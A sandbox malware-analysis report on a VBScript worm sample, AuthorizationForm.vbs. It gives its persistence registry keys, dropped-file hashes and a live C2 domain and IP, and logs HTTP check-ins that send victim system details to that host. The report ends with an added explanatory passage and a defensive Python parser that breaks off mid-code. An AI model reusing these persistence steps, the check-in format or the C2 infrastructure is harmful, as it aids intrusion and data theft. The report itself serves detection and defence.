
ID: 42946
Sample Name: AuthorizationForm.vbs
Cookbook: default.jbs
Time: 20:25:46
Date: 17/01/2018
Version: 20.0.0

Table of Contents

Table of Contents (p. 2)
Analysis Report (p. 4)
Overview (p. 4)
General Information (p. 4)
Detection (p. 4)
Confidence (p. 4)
Classification (p. 5)
Analysis Advice (p. 5)
Signature Overview (p. 6)
AV Detection (p. 6)
Networking (p. 6)
Boot Survival (p. 6)
Stealing of Sensitive Information (p. 6)
Persistence and Installation Behavior (p. 6)
Spreading (p. 6)
System Summary (p. 6)
HIPS / PFW / Operating System Protection Evasion (p. 7)
Anti Debugging (p. 7)
Malware Analysis System Evasion (p. 7)
Hooking and other Techniques for Hiding and Protection (p. 7)
Lowering of HIPS / PFW / Operating System Security Settings (p. 7)
Language, Device and Operating System Detection (p. 7)
Behavior Graph (p. 7)
Simulations (p. 8)
Behavior and APIs (p. 8)
Antivirus Detection (p. 8)
Initial Sample (p. 8)
Dropped Files (p. 8)
Domains (p. 9)
Yara Overview (p. 9)
Initial Sample (p. 9)
PCAP (Network Traffic) (p. 9)
Dropped Files (p. 9)
Memory Dumps (p. 9)
Unpacked PEs (p. 9)
Joe Sandbox View / Context (p. 9)
IPs (p. 9)
Domains (p. 9)
ASN (p. 9)
Dropped Files (p. 9)
Screenshot (p. 9)
Startup (p. 10)
Created / dropped Files (p. 10)
Contacted Domains/Contacted IPs (p. 12)
Contacted Domains (p. 12)
Contacted IPs (p. 12)
Static File Info (p. 12)
General (p. 12)
File Icon (p. 13)
Network Behavior (p. 13)
Snort IDS Alerts (p. 13)
Network Port Distribution (p. 13)
TCP Packets (p. 14)

Copyright Joe Security LLC 2018 Page 2 of 30

UDP Packets (p. 15)
DNS Queries (p. 16)
DNS Answers (p. 16)
HTTP Request Dependency Graph (p. 16)
HTTP Packets (p. 16)
Code Manipulations (p. 19)
Statistics (p. 19)
Behavior (p. 19)
System Behavior (p. 20)
Analysis Process: wscript.exe PID: 3100 Parent PID: 2852 (p. 20)
General (p. 20)
File Activities (p. 20)
File Created (p. 20)
File Deleted (p. 21)
File Written (p. 25)
Registry Activities (p. 26)
Analysis Process: explorer.exe PID: 3188 Parent PID: 2812 (p. 27)
General (p. 27)
File Activities (p. 27)
File Created (p. 27)
Analysis Process: explorer.exe PID: 3200 Parent PID: 2812 (p. 27)
General (p. 27)
File Activities (p. 27)
File Created (p. 27)
Analysis Process: explorer.exe PID: 3224 Parent PID: 548 (p. 28)
General (p. 28)
File Activities (p. 28)
Registry Activities (p. 28)
Analysis Process: explorer.exe PID: 3236 Parent PID: 2812 (p. 28)
General (p. 28)
File Activities (p. 28)
File Created (p. 28)
Analysis Process: explorer.exe PID: 3300 Parent PID: 548 (p. 29)
General (p. 29)
File Activities (p. 29)
Analysis Process: explorer.exe PID: 3344 Parent PID: 548 (p. 29)
General (p. 29)
Registry Activities (p. 29)
Analysis Process: wscript.exe PID: 3472 Parent PID: 3344 (p. 29)
General (p. 29)
File Activities (p. 30)
Disassembly (p. 30)
Code Analysis (p. 30)

Analysis Report

Overview

General Information

Joe Sandbox Version: 20.0.0
Analysis ID: 42946
Start time: 20:25:46
Joe Sandbox Product: CloudBasic
Start date: 17.01.2018
Overall analysis duration: 0h 10m 49s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: AuthorizationForm.vbs
Cookbook file name: default.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled
Detection: MAL
Classification: mal84.evad.spyw.troj.winVBS@9/6@1/1
HCA Information: Successful, ratio: 100%; Number of executed functions: 0; Number of non-executed functions: 0
EGA Information: Failed
HDC Information: Failed
Cookbook Comments: Found application associated with file extension: .vbs
Warnings:
• Exclude process from analysis (whitelisted): WmiApSrv.exe, dllhost.exe
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy: Threshold
Score: 84
Range: 0 - 100

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false

Classification

[Classification chart: categories Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware; scale levels clean, suspicious, malicious]

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Signature Overview

• AV Detection
• Networking
• Boot Survival
• Stealing of Sensitive Information
• Persistence and Installation Behavior
• Spreading
• System Summary
• HIPS / PFW / Operating System Protection Evasion
• Anti Debugging
• Malware Analysis System Evasion
• Hooking and other Techniques for Hiding and Protection
• Lowering of HIPS / PFW / Operating System Security Settings
• Language, Device and Operating System Detection


AV Detection:

Antivirus detection for submitted file

Networking:

Downloads files

Performs DNS lookups

Posts data to webserver

Urls found in memory or binary data

Detected TCP or UDP traffic on non-standard ports

Uses known network protocols on non-standard ports

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Boot Survival:

Creates an autostart registry key

Creates a start menu entry (Start Menu\Programs\Startup)

Stores files to the Windows start menu directory

Drops VBS files to the startup folder

Stealing of Sensitive Information:

Searches for user specific document files

Uploads sensitive system information to the internet (privacy leak)

Persistence and Installation Behavior:

Windows Shell Script Host drops VBS files

Spreading:

Enumerates the file system

System Summary:

Uses Rich Edit Controls

Found graphical window changes (likely an installer)

Binary contains paths to debug symbols

Classification label

Creates files inside the user directory

Creates temporary files

Executes visual basic scripts

Launches a second explorer.exe instance

Queries process information (via WMI, Win32_Process)

Reads ini files

Reads software policies

Sample is known by Antivirus (Virustotal or Metascan)

Spawns processes

Uses an in-process (OLE) Automation server

Deletes Windows files

Java / VBScript file with very long strings (likely obfuscated code)

Reads the hosts file

Suspicious javascript / visual basic script found (invalid extension)

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Anti Debugging:

Checks for debuggers (devices)

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Malware Analysis System Evasion:

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Enumerates the file system

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

May sleep (evasive loops) to hinder dynamic analysis

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)

System process connects to network (likely due to code injection or exploit)

Uses known network protocols on non-standard ports

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Behavior Graph

[Behavior graph figure. Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Is malicious, language tags (Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language). Graph header: ID 42946, Sample AuthorizationForm.vbs, Startdate 17/01/2018, Architecture WINDOWS, Score 84.

Nodes recoverable from the figure: the initial wscript.exe (signatures: Antivirus detection for submitted file; Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Detected TCP or UDP traffic on non-standard ports; 3 other signatures) starts explorer.exe, explorer.exe and 4 other processes. DNS/IP info: shkis.publicvm.com resolving to 141.255.146.245 (ports 49164, 49165, 49166), IELOIELOMainNetworkFR, Netherlands, flagged malicious. Dropped files: C:\...\AuthorizationForm.vbs:Zone.Identifier (ASCII) and C:\Users\user\...\AuthorizationForm.vbs (ASCII), each dropped twice, plus a file labelled unknown (Hitachi). A second wscript.exe is started (signatures: System process connects to network (likely due to code injection or exploit); Detected TCP or UDP traffic on non-standard ports; Suspicious javascript / visual basic script found (invalid extension); Windows Shell Script Host drops VBS files; Drops VBS files to the startup folder).]

Simulations

Behavior and APIs

Time | Type | Description
20:26:16 | API Interceptor | 4062x Sleep call for process: wscript.exe modified from: 60000ms to: 100ms
20:26:18 | API Interceptor | 43x Sleep call for process: explorer.exe modified from: 60000ms to: 100ms
20:26:18 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AuthorizationForm wscript.exe //B "C:\Users\user\AppData\Roaming\AuthorizationForm.vbs"
20:26:18 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AuthorizationForm wscript.exe //B "C:\Users\user\AppData\Roaming\AuthorizationForm.vbs"
20:26:19 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuthorizationForm.vbs

Antivirus Detection

Initial Sample

Source | Detection | Cloud Link
AuthorizationForm.vbs | 16% | virustotal
AuthorizationForm.vbs | 8% | metadefender

Dropped Files

No Antivirus matches

Domains

Source | Detection | Cloud Link
shkis.publicvm.com | 3% | virustotal

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match: IELOIELOMainNetworkFR
Associated Sample Name / URL: Invoice.rtf
SHA 256: 110695ae3af358132ab7fe6081e1f559e162bb76eef9837b9f3f4161556ae7d5
Detection: malicious
Context: 141.255.144.211

Dropped Files

No context

Screenshot

Startup

System is w7
wscript.exe (PID: 3100, cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\AuthorizationForm.vbs', MD5: 979D74799EA6C8B8167869A68DF5204A)
explorer.exe (PID: 3188, cmdline: explorer.exe wscript.exe //B 'C:\Users\user\AppData\Roaming\AuthorizationForm.vbs', MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
explorer.exe (PID: 3200, cmdline: explorer.exe wscript.exe //B 'C:\Users\user\AppData\Roaming\AuthorizationForm.vbs', MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
explorer.exe (PID: 3224, cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
explorer.exe (PID: 3236, cmdline: explorer.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuthorizationForm.vbs, MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
explorer.exe (PID: 3300, cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
explorer.exe (PID: 3344, cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
wscript.exe (PID: 3472, cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuthorizationForm.vbs', MD5: 979D74799EA6C8B8167869A68DF5204A)

Created / dropped Files

C:\Users\user\AppData\Roaming\AuthorizationForm.vbs

File Type: ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 296792
Entropy (8bit): 5.396667537631847
Encrypted: false
MD5: 5AFD6DB7F26AEF5CD3FDE76E3D7F5934
SHA1: FF5701FE33BDABE31D9987AA78C69235D77561C9
SHA-256: 8CFC6F69B81E46A4FD337BB75DABD46DCC4861FD9557A858DDC234E9FF2A3BE9
SHA-512: 9B16BF8E16BE62C3A9E3FDA6C2A8FC2DA096F9EB25E3244A5BA573D23E2DC08D7F6F98CF57CD3A957DC0A9E69018386F94C8AF819C9F512C4B91D82D50F9C016
Malicious: true
Reputation: low

C:\Users\user\AppData\Roaming\AuthorizationForm.vbs:Zone.Identifier

File Type: ASCII text, with CRLF line terminators
Size (bytes): 26
Entropy (8bit): 3.9500637564362093
Encrypted: false
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Reputation: high, very likely benign file

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuthorizationForm.vbs

File Type: ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 296792
Entropy (8bit): 5.396667537631847
Encrypted: false
MD5: 5AFD6DB7F26AEF5CD3FDE76E3D7F5934
SHA1: FF5701FE33BDABE31D9987AA78C69235D77561C9
SHA-256: 8CFC6F69B81E46A4FD337BB75DABD46DCC4861FD9557A858DDC234E9FF2A3BE9
SHA-512: 9B16BF8E16BE62C3A9E3FDA6C2A8FC2DA096F9EB25E3244A5BA573D23E2DC08D7F6F98CF57CD3A957DC0A9E69018386F94C8AF819C9F512C4B91D82D50F9C016
Malicious: true
Reputation: low

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuthorizationForm.vbs:Zone.Identifier

File Type: ASCII text, with CRLF line terminators
Size (bytes): 26
Entropy (8bit): 3.9500637564362093
Encrypted: false
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Reputation: high, very likely benign file

\samr

File Type: Hitachi SH big-endian COFF object, not stripped
Size (bytes): 116
Entropy (8bit): 4.053374040827533
Encrypted: false
MD5: 080E701E8B8E2E9C68203C150AC7C6B7
SHA1: 4EF041621388B805758AE1D3B122F9D364705223
SHA-256: FE129AE2A7C96708754F6F51091E6E512C9FEACA1042A1E9DB914C651FEB344D
SHA-512: C11D88B8E355B7B922B985802464B693F75BA4C2A62F9137A15842CA82F9B6B3ED13059EDC0DF1C04E7DE43719D892B4C0D22BB67BE0D57EAB368BA1BC057E79
Malicious: false
Reputation: high, very likely benign file

unknown

File Type: Hitachi SH big-endian COFF object, not stripped
Size (bytes): 116
Entropy (8bit): 4.053374040827533
Encrypted: false
MD5: 080E701E8B8E2E9C68203C150AC7C6B7
SHA1: 4EF041621388B805758AE1D3B122F9D364705223
SHA-256: FE129AE2A7C96708754F6F51091E6E512C9FEACA1042A1E9DB914C651FEB344D
SHA-512: C11D88B8E355B7B922B985802464B693F75BA4C2A62F9137A15842CA82F9B6B3ED13059EDC0DF1C04E7DE43719D892B4C0D22BB67BE0D57EAB368BA1BC057E79
Malicious: true
Reputation: high, very likely benign file

Contacted Domains/Contacted IPs

Contacted Domains

Name: shkis.publicvm.com
IP: 141.255.146.245
Active: true
Malicious: true
Antivirus Detection: 3%, virustotal

Contacted IPs


IP: 141.255.146.245
Country: Netherlands
ASN: 29075
ASN Name: IELOIELOMainNetworkFR
Malicious: true

Static File Info

General

File type: ASCII text, with very long lines, with CRLF line terminators
Entropy (8bit): 5.396667537631847
TrID:
File name: AuthorizationForm.vbs
File size: 296792
MD5: 5afd6db7f26aef5cd3fde76e3d7f5934
SHA1: ff5701fe33bdabe31d9987aa78c69235d77561c9
SHA256: 8cfc6f69b81e46a4fd337bb75dabd46dcc4861fd9557a858ddc234e9ff2a3be9
SHA512: 9b16bf8e16be62c3a9e3fda6c2a8fc2da096f9eb25e3244a5ba573d23e2dc08d7f6f98cf57cd3a957dc0a9e69018386f94c8af819c9f512c4b91d82d50f9c016


File Content Preview: ''mRzjMuvQIYGIUzwZilEDgejfTvADzvMmxjOkwmKGDx vlRhTQhliSTugyfSTFuUeyUvvSGgHHQxMTTKIQGTyjh xIEEwvOORQOSKTLIgHZFQAEvxKhUhLGuGluSR..'m RzjMuvQIYGIUzwZilEDgejfTvADzvMmxjOkwmKGDxvl RhTQhliSTugyfSTFuUeyUvvSGgHHQxMTTKIQGTyjhxI EEwvOORQOSKTLIgHZFQAEvxKhUhLGuGluSR..'mR z

File Icon

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/17/18-20:26:32.173908 | TCP | 2017516 | ET TROJAN Worm.VBS.Dunihi Checkin 1 | 49164 | 83 | 192.168.2.2 | 141.255.146.245
01/17/18-20:28:49.204527 | TCP | 2017516 | ET TROJAN Worm.VBS.Dunihi Checkin 1 | 49165 | 83 | 192.168.2.2 | 141.255.146.245
01/17/18-20:31:04.239506 | TCP | 2017516 | ET TROJAN Worm.VBS.Dunihi Checkin 1 | 49166 | 83 | 192.168.2.2 | 141.255.146.245
01/17/18-20:32:40.879216 | TCP | 2017516 | ET TROJAN Worm.VBS.Dunihi Checkin 1 | 49167 | 83 | 192.168.2.2 | 141.255.146.245
01/17/18-20:32:54.107383 | TCP | 2017516 | ET TROJAN Worm.VBS.Dunihi Checkin 1 | 49168 | 83 | 192.168.2.2 | 141.255.146.245
01/17/18-20:33:07.531547 | TCP | 2017516 | ET TROJAN Worm.VBS.Dunihi Checkin 1 | 49169 | 83 | 192.168.2.2 | 141.255.146.245
01/17/18-20:33:21.001355 | TCP | 2017516 | ET TROJAN Worm.VBS.Dunihi Checkin 1 | 49170 | 83 | 192.168.2.2 | 141.255.146.245
01/17/18-20:33:34.377418 | TCP | 2017516 | ET TROJAN Worm.VBS.Dunihi Checkin 1 | 49171 | 83 | 192.168.2.2 | 141.255.146.245
01/17/18-20:33:47.679172 | TCP | 2017516 | ET TROJAN Worm.VBS.Dunihi Checkin 1 | 49172 | 83 | 192.168.2.2 | 141.255.146.245
01/17/18-20:34:01.086682 | TCP | 2017516 | ET TROJAN Worm.VBS.Dunihi Checkin 1 | 49173 | 83 | 192.168.2.2 | 141.255.146.245
01/17/18-20:34:14.583150 | TCP | 2017516 | ET TROJAN Worm.VBS.Dunihi Checkin 1 | 49174 | 83 | 192.168.2.2 | 141.255.146.245
01/17/18-20:34:27.979750 | TCP | 2017516 | ET TROJAN Worm.VBS.Dunihi Checkin 1 | 49175 | 83 | 192.168.2.2 | 141.255.146.245
01/17/18-20:34:41.336472 | TCP | 2017516 | ET TROJAN Worm.VBS.Dunihi Checkin 1 | 49176 | 83 | 192.168.2.2 | 141.255.146.245
01/17/18-20:34:54.392509 | TCP | 2017516 | ET TROJAN Worm.VBS.Dunihi Checkin 1 | 49177 | 83 | 192.168.2.2 | 141.255.146.245

Network Port Distribution

Total Packets: 70
• 83 undefined
• 53 (DNS)

TCP Packets


UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 17, 2018 20:26:31.234621048 CET | 63266 | 53 | 192.168.2.2 | 8.8.8.8
Jan 17, 2018 20:26:31.572985888 CET | 53 | 63266 | 8.8.8.8 | 192.168.2.2

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 17, 2018 20:26:31.234621048 CET | 192.168.2.2 | 8.8.8.8 | 0xc2a9 | Standard query (0) | shkis.publicvm.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 17, 2018 20:26:31.572985888 CET | 8.8.8.8 | 192.168.2.2 | 0xc2a9 | No error (0) | shkis.publicvm.com | (none) | 141.255.146.245 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

shkis.publicvm.com:83

HTTP Packets

Session ID: 0, Source IP: 192.168.2.2, Source Port: 49164, Destination IP: 141.255.146.245, Destination Port: 83, Process: C:\Windows\System32\wscript.exe
Timestamp: Jan 17, 2018 20:26:32.173907995 CET, kBytes transferred: 0, Direction: OUT, Data:
POST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018
Accept-Encoding: gzip, deflate
Host: shkis.publicvm.com:83
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Session ID: 1, Source IP: 192.168.2.2, Source Port: 49165, Destination IP: 141.255.146.245, Destination Port: 83, Process: C:\Windows\System32\wscript.exe
Timestamp: Jan 17, 2018 20:28:49.204526901 CET, kBytes transferred: 1, Direction: OUT, Data:
POST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018
Accept-Encoding: gzip, deflate
Host: shkis.publicvm.com:83
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Session ID: 10, Source IP: 192.168.2.2, Source Port: 49174, Destination IP: 141.255.146.245, Destination Port: 83, Process: C:\Windows\System32\wscript.exe
Timestamp: Jan 17, 2018 20:34:14.583149910 CET, kBytes transferred: 8, Direction: OUT, Data:
POST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018
Accept-Encoding: gzip, deflate
Host: shkis.publicvm.com:83
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Session ID: 11, Source IP: 192.168.2.2, Source Port: 49175, Destination IP: 141.255.146.245, Destination Port: 83, Process: C:\Windows\System32\wscript.exe
Timestamp: Jan 17, 2018 20:34:27.979749918 CET, kBytes transferred: 9, Direction: OUT, Data:
POST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018
Accept-Encoding: gzip, deflate
Host: shkis.publicvm.com:83
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Session ID: 12, Source IP: 192.168.2.2, Source Port: 49176, Destination IP: 141.255.146.245, Destination Port: 83, Process: C:\Windows\System32\wscript.exe
Timestamp: Jan 17, 2018 20:34:41.336472034 CET, kBytes transferred: 10, Direction: OUT, Data:
POST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018
Accept-Encoding: gzip, deflate
Host: shkis.publicvm.com:83
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Session ID: 13, Source IP: 192.168.2.2, Source Port: 49177, Destination IP: 141.255.146.245, Destination Port: 83, Process: C:\Windows\System32\wscript.exe
Timestamp: Jan 17, 2018 20:34:54.392508984 CET, kBytes transferred: 11, Direction: OUT, Data:
POST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018
Accept-Encoding: gzip, deflate
Host: shkis.publicvm.com:83
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Session ID: 2, Source IP: 192.168.2.2, Source Port: 49166, Destination IP: 141.255.146.245, Destination Port: 83, Process: C:\Windows\System32\wscript.exe
Timestamp: Jan 17, 2018 20:31:04.239506006 CET, kBytes transferred: 2, Direction: OUT, Data:
POST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018
Accept-Encoding: gzip, deflate
Host: shkis.publicvm.com:83
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Session ID Source IP Source Port Destination IP Destination Port Process 3 192.168.2.2 49167 141.255.146.245 83 C:\Windows\System32\wscript.exe

kBytes Timestamp transferred Direction Data

Copyright Joe Security LLC 2018 Page 17 of 30 kBytes Timestamp transferred Direction Data Jan 17, 2018 3 OUT POST /is-ready HTTP/1.1 20:32:40.879215956 CET Accept: */* Accept-Language: en-US User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018 Accept-Encoding: gzip, deflate Host: shkis.publicvm.com:83 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID Source IP Source Port Destination IP Destination Port Process 4 192.168.2.2 49168 141.255.146.245 83 C:\Windows\System32\wscript.exe

kBytes Timestamp transferred Direction Data Jan 17, 2018 3 OUT POST /is-ready HTTP/1.1 20:32:54.107383013 CET Accept: */* Accept-Language: en-US User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018 Accept-Encoding: gzip, deflate Host: shkis.publicvm.com:83 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID Source IP Source Port Destination IP Destination Port Process 5 192.168.2.2 49169 141.255.146.245 83 C:\Windows\System32\wscript.exe

kBytes Timestamp transferred Direction Data Jan 17, 2018 4 OUT POST /is-ready HTTP/1.1 20:33:07.531547070 CET Accept: */* Accept-Language: en-US User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018 Accept-Encoding: gzip, deflate Host: shkis.publicvm.com:83 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID Source IP Source Port Destination IP Destination Port Process 6 192.168.2.2 49170 141.255.146.245 83 C:\Windows\System32\wscript.exe

kBytes Timestamp transferred Direction Data Jan 17, 2018 5 OUT POST /is-ready HTTP/1.1 20:33:21.001354933 CET Accept: */* Accept-Language: en-US User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018 Accept-Encoding: gzip, deflate Host: shkis.publicvm.com:83 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID Source IP Source Port Destination IP Destination Port Process 7 192.168.2.2 49171 141.255.146.245 83 C:\Windows\System32\wscript.exe

kBytes Timestamp transferred Direction Data

Copyright Joe Security LLC 2018 Page 18 of 30 kBytes Timestamp transferred Direction Data Jan 17, 2018 6 OUT POST /is-ready HTTP/1.1 20:33:34.377418041 CET Accept: */* Accept-Language: en-US User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018 Accept-Encoding: gzip, deflate Host: shkis.publicvm.com:83 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID Source IP Source Port Destination IP Destination Port Process 8 192.168.2.2 49172 141.255.146.245 83 C:\Windows\System32\wscript.exe

kBytes Timestamp transferred Direction Data Jan 17, 2018 7 OUT POST /is-ready HTTP/1.1 20:33:47.679172039 CET Accept: */* Accept-Language: en-US User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018 Accept-Encoding: gzip, deflate Host: shkis.publicvm.com:83 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID Source IP Source Port Destination IP Destination Port Process 9 192.168.2.2 49173 141.255.146.245 83 C:\Windows\System32\wscript.exe

kBytes Timestamp transferred Direction Data Jan 17, 2018 8 OUT POST /is-ready HTTP/1.1 20:34:01.086682081 CET Accept: */* Accept-Language: en-US User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018 Accept-Encoding: gzip, deflate Host: shkis.publicvm.com:83 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
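The sessions above are one implant check-in repeated roughly every 13 seconds: an empty-bodied POST to /is-ready whose User-Agent header is not a browser string but the victim profile packed as "<|>"-separated fields (volume-serial-style ID and hostname, computer, user, OS, a tag, the AV state, a flag and the date). The Host is a dynamic-DNS name on the non-standard port 83, both trivially changed by the operator, so a detection should key on the request shape rather than on the name. This check-in layout is the one commonly associated with the Houdini/H-Worm VBS family; that attribution is made here, not by the report. The Python below is an added example for this page, not code from the report or from the sample: it parses the captured request, decodes the profile fields, and measures how regular the check-ins are from the report's own timestamps. The request text and timestamps are reconstructed from the table; the field labels (id, hostname, tag, flag) are this example's reading of the format; session 10 is not on this page, so one gap is about twice the others.

```python
"""Added example for this page, not code from the Joe Sandbox report or
from the analysed sample.  It decodes the POST /is-ready check-in shown
in the packet table and measures how regularly it recurs.  The request
text and the timestamp list are reconstructed from the report; the names
given to the '<|>'-separated User-Agent fields are our own labels."""
import statistics
from datetime import datetime

# Reconstructed from the report's HTTP packet table (all sessions are identical).
SAMPLE_REQUEST = (
    "POST /is-ready HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en-US\r\n"
    "User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>"
    "Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Host: shkis.publicvm.com:83\r\n"
    "Content-Length: 0\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)

# Check-in times (CET, Jan 17 2018) for sessions 2-9 and 11-13 as printed in
# the report; session 10 is not on this page, so one gap is about twice the rest.
SAMPLE_TIMESTAMPS = [
    "20:31:04.239506006", "20:32:40.879215956", "20:32:54.107383013",
    "20:33:07.531547070", "20:33:21.001354933", "20:33:34.377418041",
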